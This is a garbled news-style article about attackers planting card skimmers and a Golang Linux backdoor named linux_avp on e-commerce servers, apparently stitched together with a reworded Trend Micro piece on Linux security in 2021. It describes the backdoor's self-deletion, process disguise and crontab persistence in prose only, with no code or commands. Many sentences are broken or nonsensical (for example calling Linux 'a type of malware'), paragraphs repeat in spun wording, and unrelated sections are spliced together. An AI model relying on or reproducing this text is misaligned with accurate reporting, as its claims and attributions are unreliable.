Hackers place Linux malware, and web skimmer on e-commerce servers

Security researchers have discovered. Key online store websites have credit card skimmers. After injecting this, the attackers are also deploying a Linux backdoor on the compromised e-commerce server. Attackers hack online and tell customers to download fake payment forms on the payment pages displayed. And use this script to inject. The store found that the attacker began with an automated e-commerce attack investigation. Tested dozens of vulnerabilities across common online store platforms. Sansei’s threat is revealed by the research team.

Linux malware not detected by the security software

The same server contains malware detected by Dutch cybersecurity company Sansec. Golang-bas malware download as linux_avp executable. And executed on the infringing server. Once started, it immediately removes itself from the disk. And disguises itself as a “ps -ef” process. that it uses to get a list of ongoing processes. linux_avp Analyzing the backdoor, Sansec found. It is then awaiting orders from servers in Beijing hosted on Alibaba’s network.

They also found that the malware would gain persistence by adding a new crontab entry that would re-download the malicious payload from its command and control server and reinstall the backdoor if it is detected and removed or the server reboots. So far, this backdoor has not been detected by anti-malware engines on VirusTotal even though a sample was first uploaded over a month ago on October 8.

The downloader could be the creator of linux_avp. So it submits a day. after the researchers at a Dutch cybersecurity company. Sansec spotts it while investigating the e-commerce site breach.

The current state of Linux security

Linux is powerful, universal, and reliable, but it is not without its flaws; like other operating systems, it is always susceptible to attack. This addresses the state of Linux security in the first half of 2021. It gives an in-depth view of the Linux threat landscape. Here, we discuss various pressing issues affecting Linux, including types of malware existing in the Linux world, vulnerabilities affecting the Linux OS, and various software stacks running on it. This article will also cover web application security risks. and continue to focus more on how attackers exploit them to compromise Linux systems running in the cloud.

The data presented in this article is from Data Lake for all searches on Trend MicroTMSmart Protection Network ™ (SPN), or all Trend Micro products. We also collected data from honeypots, sensors, anonymous telemetry, and other backend services. This data represents the true prevalence of malware exploitation and insecurity in enterprises.

Many consider Linux to be a unique operating system due to its stability, flexibility, and open-source nature. More than a few examples prove that his excellent reputation has such grounds as so numerous significant achievements during the last years. For example, 100% of the top 500 world supercomputers run on Linux, while according to W3Techs, 50.5% of the top 1000 websites on the globe use it. Our previous article mentioned how Linux is dominating the cloud: running on 90% of public cloud workloads in 2017. Linux uniquely supports cloud workloads at the best value for money in the world. Then use advanced RISC machine processors, such as AWS Graviton. Besides running on 96.3% of the world’s top 1 million web servers, Linux also powers smartwatches, bullet trains, and even the world’s major space programs.

We look at some security issues affecting Linux

Linux is amazing, all-inclusive, and dependable, however, it isn’t without its imperfections; like other working frameworks, it is consistently defenseless to assault. This article examines the Linux security province in the early part of 2021. And Linux looks at the threat scene from top to bottom. Linux is a type of malware that exists in the world. Weaknesses affecting the Linux working framework and the sudden increase in demand. We will discuss some of the security factors concerning Linux, bearing in mind the different programming stacks. Furthermore, it is rather aggressive in thinking about reassessing. security risks associated with a web application and, more importantly, the framework running in the cloud. This includes how they exploit.

So Red Hat employs enterprise users, Among Linux/Unix-based deployments. Then followed by AWS Linux and Ubuntu. Organizations rely on well-maintained sources of Linux deployments for their workloads and this chart reflects the support provided by the vendors. For example, Red Hat Enterprise Linux (RHEL) and Amazon Linux AMI. They are the first to offer solutions, especially for their supported versions. This data distribution was not surprising to most readers. However, it should be not that about 2.6% of them are IBM AIX and Oracle Solaris. AIX and Oracle Solaris are known for their high stability and strength. So critical workloads of businesses run on these platforms.
At the time of writing, all command and control (C&C) servers were down, reminiscent of typical attacks targeting a small number of targets, with operators shutting down the infrastructure once their goals are met.